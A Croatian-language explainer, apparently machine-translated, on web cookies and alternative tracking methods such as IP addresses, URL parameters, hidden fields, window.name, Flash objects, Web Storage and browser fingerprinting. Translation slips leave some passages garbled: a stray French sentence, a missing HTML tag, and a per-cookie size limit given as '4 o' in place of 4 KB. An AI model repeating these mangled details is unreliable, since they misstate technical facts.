Stručnjaci za sigurnost privatnosti kritizirali su trajne kolačiće jer nisu postavljeni da isteknu dovoljno brzo, čime se web stranicama omogućuje praćenje korisnika i izgradnja njihovog profila tijekom vremena. Ovaj aspekt kolačića također je dio problema otmice sesije, jer se ukradeni trajni kolačić može koristiti za lažno predstavljanje korisnika tijekom dužeg vremenskog razdoblja.

Za čitanje također: GAFAM: tko su oni? Zašto su (ponekad) tako strašni?

Alternative kolačićima

Neke operacije koje se mogu izvesti korištenjem kolačića također se mogu izvršiti korištenjem drugih mehanizama koji zaobilaze kolačiće ili ponovno stvaraju izbrisane kolačiće, što stvara probleme privatnosti na isti način (ili ponekad gore jer su tada nevidljivi) kao kolačići.

IP adresa

Korisnici se mogu pratiti pomoću IP adrese računala koje poziva stranicu. Ova tehnika je dostupna od uvođenja World Wide Weba, dok se stranice preuzimaju, poslužitelj zahtijeva IP adresu računala na kojem je pokrenut preglednik ili proxy, ako se nijedan ne koristi. Poslužitelj može pratiti ove informacije bez obzira koriste li se kolačići ili ne. Međutim, te su adrese obično manje pouzdane u identificiranju korisnika od kolačića jer računala i proxy poslužitelje može dijeliti više korisnika, a isto računalo može primiti drugu IP adresu u svakoj radnoj sesiji (kao što je c često slučaj za telefonske veze) .

Praćenje prema IP adresama može biti pouzdano u nekim situacijama, kao što su širokopojasne veze koje održavaju istu IP adresu dugo vremena, sve dok je napajanje uključeno.

Neki sustavi kao što je Tor dizajnirani su za održavanje anonimnosti interneta i čine praćenje putem IP adrese nemogućim ili nepraktičnim.

URL

Preciznija tehnika temelji se na ugrađivanju informacija u URL-ove. Dio niza upita URL-a jedna je od tehnika koja se obično koristi za ovu svrhu, ali mogu se koristiti i drugi dijelovi. I Java serverlet i PHP mehanizmi sesije koriste ovu metodu ako kolačići nisu omogućeni.

Ova metoda uključuje web poslužitelj koji zahtjeve niza dodaje vezama web stranice koja ga prenosi kada se pošalje pregledniku. Kada korisnik slijedi vezu, preglednik poslužitelju vraća priloženi niz upita.

Nizovi upita koji se koriste u tu svrhu i kolačići vrlo su slični, oboje su informacije koje proizvoljno bira poslužitelj, a vraća preglednik. Međutim, postoje neke razlike: kada se ponovno koristi URL koji sadrži niz upita, iste se informacije šalju poslužitelju. Na primjer, ako su korisničke postavke kodirane u nizu upita URL-a i korisnik pošalje taj URL drugom korisniku putem e-pošte, taj će korisnik također moći koristiti te postavke.

S druge strane, kada korisnik dvaput pristupi istoj stranici, nema jamstva da će isti niz upita biti korišten oba puta. Na primjer, ako korisnik prvi put dođe na stranicu s unutarnje stranice web-mjesta i drugi put dođe na istu stranicu s vanjske stranice, niz upita u odnosu na stranicu web-mjesta obično je drugačiji, dok su kolačići isti .

Drugi nedostaci nizova upita povezani su sa sigurnošću: čuvanje podataka koji identificiraju sesiju u nizovima upita omogućuje ili pojednostavljuje napade fiksiranja sesije, napade reference identifikatora i druge iskorištavanja. Prosljeđivanje ID-ova sesije kao HTTP kolačića je sigurnije.

Skriveno polje obrasca

Jedan oblik praćenja sesije, koji koristi ASP.NET, je korištenje web obrazaca sa skrivenim poljima. Ova tehnika je vrlo slična korištenju nizova URL upita za prijenos informacija i ima iste prednosti i nedostatke; a ako se obrazac obrađuje HTTP GET metodom, polja zapravo postaju dio URL-a preglednika koji će ga poslati prilikom podnošenja obrasca. Ali većina obrazaca obrađuje se HTTP POST-om, što uzrokuje dodavanje informacija obrasca, uključujući skrivena polja, kao dodatni unos koji nije dio URL-a niti kolačića.

Ovaj pristup ima dvije prednosti iz perspektive praćenja: prvo, praćenje informacija smještenih u HTML izvorni kod i POST unos umjesto URL-a omogućit će prosječnom korisniku da izbjegne ovo praćenje; drugo, informacije o sesiji se ne kopiraju kada korisnik kopira URL (za spremanje stranice na disk ili slanje putem e-pošte, na primjer).

prozor.ime

Svi uobičajeni web preglednici mogu pohraniti prilično veliku količinu podataka (2 MB do 32 MB) putem JavaScripta pomoću DOM-ovog svojstva window.name. Ovi se podaci mogu koristiti umjesto kolačića sesije, a također se koriste na više domena. Tehnika se može spojiti s JSON objektima za pohranu složenog skupa varijabli sesije na strani klijenta.

Loša strana je da će svaki zasebni prozor ili kartica u početku imati prazan window.name; kada pregledavate po karticama (koje otvara korisnik) to znači da kartice otvorene pojedinačno neće imati naziv prozora. Osim toga, window.name se može koristiti za praćenje posjetitelja na različitim stranicama što može predstavljati problem privatnosti.

U nekim aspektima ovo može biti sigurnije od kolačića, zbog neuključenosti poslužitelja, što ga čini neranjivim na mrežni napad sniffer kolačića. Međutim, ako se poduzmu posebne mjere za zaštitu podataka, oni su ranjivi na daljnje napade, jer su podaci dostupni putem drugih stranica otvorenih u istom prozoru.

HTTP provjera autentičnosti

HTTP protokol uključuje osnovne protokole provjere autentičnosti pristupa i sažetak provjere autentičnosti pristupa, koji dopušta pristup web stranici samo kada je korisnik dao korisničko ime i lozinku. okej prolaz. Ako poslužitelj zatraži certifikat za dopuštanje pristupa web stranici, preglednik ga traži od korisnika i nakon što ga dobije, pohranjuje ga i šalje u svim sljedećim HTTP zahtjevima. Ove informacije mogu se koristiti za praćenje korisnika.

Lokalni zajednički objekt

Ako preglednik uključuje dodatak Adobe Flash Player, lokalni zajednički objekti mogu se koristiti u istu svrhu kao i kolačići. Oni mogu biti privlačan izbor za web programere jer:

• zadano ograničenje veličine za lokalni zajednički objekt je 100 KB;
• sigurnosne provjere odvojene su od korisničkih provjera kolačića (tako da se lokalni zajednički objekti mogu dopustiti kada kolačići nisu).

Ova posljednja točka, koja razlikuje politiku upravljanja kolačićima od Adobeovih lokalnih dijeljenih objekata postavlja pitanja u vezi s korisnikovim upravljanjem njegovim postavkama privatnosti: on mora biti svjestan da njegovo upravljanje kolačićima nema utjecaja na upravljanje lokalnim dijeljenim objektima, i obrnuto.

Još jedna kritika ovog sustava je da se može koristiti samo preko Adobe Flash Player dodatka koji je vlasnički i nije web standard.

Upornost na strani klijenta

Neki web preglednici podržavaju mehanizam postojanosti temeljen na skripti, koji stranici omogućuje lokalno pohranjivanje informacija za kasniju upotrebu. Internet Explorer, na primjer, podržava trajne informacije u povijesti preglednika, knjižnim oznakama, u formatu pohranjenom u XML-u ili izravno s web stranicom spremljenom na disk. Za Microsoft Internet Explorer 5 postoji metoda korisničkih podataka dostupna kroz DHTML ponašanja.

W3C je u HTML 5 uveo novi JavaScript API za pohranu podataka na strani klijenta pod nazivom Web pohrana i cilj mu je trajno zamijeniti kolačiće. Sličan je kolačićima, ali sa znatno poboljšanim kapacitetom i bez pohranjivanja informacija u zaglavlju HTTP zahtjeva. API dopušta dvije vrste web pohrane: localstorage i sessionstorage, slično trajnim kolačićima i kolačićima sesije (osim što kolačići sesije istječu kada se preglednik zatvori dok pohranjivanje sesije isteći kada se kartica zatvori). Web pohranu podržavaju Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 i Opera 10.50.

Drugi mehanizam obično se oslanja na predmemoriju preglednika (u memoriji, a ne na osvježavanju) pomoću JavaScript programa na web stranicama. 

Na primjer, stranica može sadržavati oznaku . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

U ovom trenutku program ostaje u predmemorij i posjećena stranica se ne učitava drugi put. Posljedično, ako program sadrži globalnu varijablu (na primjer var id = 3243242;), ovaj identifikator ostaje važeći i može ga iskoristiti drugi JavaScript kod kada se stranica ponovno učita ili kada se učita stranica koja povezuje program. 

Glavni nedostatak ove metode je da JavaScript globalna varijabla mora biti statična, što znači da se ne može mijenjati ili brisati poput kolačića.

otisak prsta web preglednika

Otisak prsta preglednika je informacija prikupljena o postavkama konfiguracije preglednika u svrhu identifikacije. Ovi otisci prstiju mogu se koristiti za potpunu ili djelomičnu identifikaciju internetskog korisnika ili uređaja čak i kada su kolačići onemogućeni.

Osnovne informacije o konfiguraciji web-preglednika dugo su prikupljale usluge za publiku web-mjesta u svrhu preciznog mjerenja ljudskog web-prometa i otkrivanja različitih oblika prijevara klikova. Uz pomoć skriptnih jezika na strani klijenta, prikupljanje informacija je mnogo preciznije sada moguće.

Pretvaranje ove informacije u bitni niz proizvodi otisak prsta uređaja. Godine 2010. Electronic Frontier Foundation (EFF) izmjerio je entropiju otiska prsta preglednika na najmanje 18,1 bita, a to je bilo prije nego što je napredak u otisku prstiju na platnu dodao 5,7 bita toj entropiji.

Kolačići ukratko

Kolačići su male tekstualne datoteke koje web preglednik pohranjuje na tvrdi disk posjetitelja web stranice i koje se (između ostalog) koriste za bilježenje informacija o posjetitelju ili njegovom putovanju kroz stranicu. Webmaster tako može prepoznati navike posjetitelja i personalizirati prezentaciju svoje stranice za svakog posjetitelja; kolačići zatim omogućuju pamćenje koliko članaka prikazati na početnoj stranici ili čak zadržavanje vjerodajnica za prijavu za bilo koju privatnu stranu: kada se posjetitelj vrati na stranicu, više nije potrebno da upisuje svoje ime i lozinku za biti prepoznati, jer se automatski čitaju u kolačiću.

Kolačić ima ograničen životni vijek, koji je postavio dizajner stranice. Također mogu isteći na kraju sesije na stranici, što odgovara zatvaranju preglednika. Kolačići se široko koriste kako bi posjetiteljima olakšali život i pružili im relevantnije informacije. No, posebne tehnike omogućuju praćenje posjetitelja na nekoliko stranica i na taj način prikupljanje i unakrsnu provjeru vrlo opsežnih informacija o njegovim navikama. Ova metoda priskrbila je korištenju kolačića reputaciju tehnike nadzora koja narušava privatnost posjetitelja, što nažalost odgovara stvarnosti u mnogim slučajevima korištenja iz netehničkih razloga ili nepoštivanja očekivanja korisnika. .

Kao odgovor na te opravdane strahove, HTML 5 uvodi novi JavaScript API za pohranu podataka na strani klijenta koji se zove Web pohrana, koji je puno sigurniji i s većim kapacitetom, a čiji je cilj zamijeniti kolačiće.

Pohranjivanje kolačića

S nekim preglednicima, kolačić je lako uređivati, jednostavan uređivač teksta poput Notepada dovoljan je za ručnu promjenu njegovih vrijednosti.

Kolačići se spremaju različito ovisno o pregledniku:

• Microsoft Internet Explorer sprema svaki kolačić u drugu datoteku;
• Mozilla Firefox sprema sve svoje kolačiće u jednu datoteku;
• Opera sprema sve svoje kolačiće u jednu datoteku i šifrira ih (nije ih moguće mijenjati osim u softverskim opcijama);
• Apple Safari sprema sve svoje kolačiće u jednu datoteku proširenja .plist. Modifikacija je moguća, ali nije baš jednostavna, osim ako ne prođete kroz opcije softvera.

Za podršku su potrebni preglednici najmanje :

• 300 istovremenih kolačića;
• 4 o po kolačiću;
• 20 kolačića po hostu ili domeni.